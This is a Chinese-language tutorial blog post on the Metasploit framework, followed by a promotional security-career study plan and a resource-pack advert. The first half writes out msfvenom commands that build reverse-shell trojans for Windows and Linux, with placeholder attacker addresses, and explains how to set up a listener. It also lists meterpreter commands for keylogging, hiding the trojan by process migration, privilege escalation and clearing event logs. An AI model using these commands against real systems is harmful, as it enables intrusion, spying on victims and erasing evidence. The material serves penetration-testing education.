Msf基础
Metasploit-framework(用ruby写的)基础:
MSF拥有世界上最大的渗透测试攻击数据库
Vulnerability:漏洞统称
expoit:攻击代码或者程序
Payload:完成实际攻击功能的代码
module:组成完整系统的基本构造块,每个模块执行特定任务
运行msf:
1.sudo service postgresql start(开启数据库)
2.msfconsole
msf架构:
msf模块介绍:
Exploit:msf最核心的模块,里面有针对不同操作系统不同服务的攻击,包括mac和andriod
encoders没啥用,编码,自己提供编码倒是可以
evasion:免杀,也没啥用,现在免杀也免不了被杀
Ms17-010:ms指微软17-010指17年编号010的漏洞
msf的基本命令:
命令 | 说明 |
---|---|
Use | 选择渗透攻击模块 |
Show payloads | 查看与该攻击模块相兼容的攻击载荷 |
Set payloads | 设置攻击载荷 |
Set target | 设置目标 |
Show options | 查看需要设置的配置参数 |
Exploit | 实施渗透测试攻击 |
注意:metasploit渗透攻击模块在目录:/usr/share/metasploit-framework/modules/exploits
msf直接渗透
1、根据模块搜集exp:search module
2、根据需要攻击的模块,use切换到对应的expolit内,然后show options
查看需要配置的内容
required显示为yes就是必须要配置的服务
445是smb服务,是windows一定会开启的服务
3、set rhosts ip
(也可以指定文件)配置攻击ip
4、下面两种payload是show payload
查出来的,每个不同的攻击expolit有自己的payloads
Linux(windows)/x64/meterpreter/bind_ipv6_tcp
是(带bind)在服务器开放一个端口等待我方攻击机连接
Linux(windows)/x64/meterpreter/reverse_name_pipe
是(带reverse)是在本地开放一个端口,等待被控服务器主动连接
上述两种最后的name_pipe,ipv6_tcp,tcp,tcp_rc4
的等是指连接的协议
5、set payload Linux(windows)/x64/meterpreter/reverse_name_pipe
配置载荷
Show options
查看需要设置的内容
所以msf远控是先配置expolit,再配置payload
流程为: search module --> use expolit --> show options --> 配置exp --> show payloads --> set payload … --> show options --> 配置payloads --> expolit
msf的攻击原理:
看[*]是攻击过程:先是在本机开放4444端口
然后调用auxiliary的辅助模块进行扫描
扫描到一台存活的主机,开始攻击
标红代表攻击失败
二、msf远控功能:
命令:msfvenom
生成一个被控端的exe程序,在服务器上的木马程序
Msf -I payloads
列出所有的payload
Msfvenom --list plantform
查看支持生成木马的平台
生成针对windows的远控木马:
1、msfvenom生成木马
Msfnom -p 指定payload LHOST=攻击机ip地址(别用127.0.0.1) LPORT=连接端口号 -f指定payload输出格式>输出位置和名字
比如:生成windows下反弹shell的木马:
Msfvenom -p windows/meterpreter/reverse_tcp LHOST=<攻击机ip地址> LPORT=<连接端口号> -f exe > name.exe
生成linux下反弹shell的木马:
Msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<攻击机ip地址> LPORT=<连接端口号> -f elf > name.elf
2、将木马上传至目标机
3、在msfconsole中进行监听反弹的shell
开启metasploit设置监听参数:
①在metaspolit中使用handler为主动端,hander在exploit/multi
②设置payload,和前面制作木马时使用的payload一致
③设置lhost和lport(和前面制作木马的参数一样)
④expolit监听,等待被控端打开木马
Sessions -l
显示开启的session
msf的payload是分两段发送的,先发送核心payload,然后再用这段核心payload下载其他payload,如果连接失败,就会只存在核心payload
监听成功后,shell进入靶机终端
还有很多命令,screenshot
截图,keyscan_start
开启键盘监听,mouse
鼠标等等
lcd
切换本地路径
upload src
. 把src文件上传到靶机当前目录,用来上传后续文件
meterpreter概述
介绍:
·Meterpreter是Metasploit框架中的一个杀手锏,通常作为漏洞溢出后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给我们一个控制通道。
·例如∶利用远程过程调用(RPC)服务的一个漏洞,当漏洞触发后,我们选择Meterpreter作为攻击载荷,就能够取得目标系统上的一个Meterpreter Shell连接。
·Meterpreter是Metasploit框架的一个扩展模块,可以调用Metasploit的一些功能,对目标系统进行更为深入的渗透,这些功能包括反追踪、纯内存工作模式、密码哈希获取、特权提升、跳板攻击等等
技术优势∶
·Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台。
·Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。不需要访问目标主机磁盘,所以也没什么入侵的痕迹。
·另外,Meterpreter还提供了基于PHP和Java语言的实现。
Reverse_tcp:
隐藏木马方法:进程注入(需要有最高权限)
ps显示当前进程
Migrate -P pid把当前木马进程迁移至pid,通常迁移至系统程序,因为随着迁移程序的关闭,木马也会随之关闭
Session -j -z挂起监听模式,也就是可以继续执行任务,并在后台监听
在攻击完成后,clearev清楚事件日志
其他各种实用命令:
getsystem尝试提权
play播放音乐
portwd端口转发
execute执行文件
sysinfo得到目标系统的一些信息
shutdown关闭目标主机接下来我将给各位同学划分一张学习计划表!
学习计划
那么问题又来了,作为萌新小白,我应该先学什么,再学什么?
既然你都问的这么直白了,我就告诉你,零基础应该从什么开始学起:
阶段一:初级网络安全工程师
接下来我将给大家安排一个为期1个月的网络安全初级计划,当你学完后,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web渗透、安全服务、安全分析等岗位;其中,如果你等保模块学的好,还可以从事等保工程师。
综合薪资区间6k~15k
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)
2、渗透测试基础(1周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等
3、操作系统基础(1周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)
4、计算机网络基础(1周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现
5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固
6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)
那么,到此为止,已经耗时1个月左右。你已经成功成为了一名“脚本小子”。那么你还想接着往下探索吗?
阶段二:中级or高级网络安全工程师(看自己能力)
综合薪资区间15k~30k
7、脚本编程学习(4周)
在网络安全领域。是否具备编程能力是“脚本小子”和真正网络安全工程师的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力。
零基础入门的同学,我建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习
搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP,IDE强烈推荐Sublime;
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,没必要看完
用Python编写漏洞的exp,然后写一个简单的网络爬虫
PHP基本语法学习并书写一个简单的博客系统
熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选)
了解Bootstrap的布局或者CSS。
阶段三:顶级网络安全工程师
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
学习资料分享
当然,只给予计划不给予学习资料的行为无异于耍流氓,这里给大家整理了一份【282G】的网络安全工程师从入门到精通的学习资料包,可点击下方二维码链接领取哦。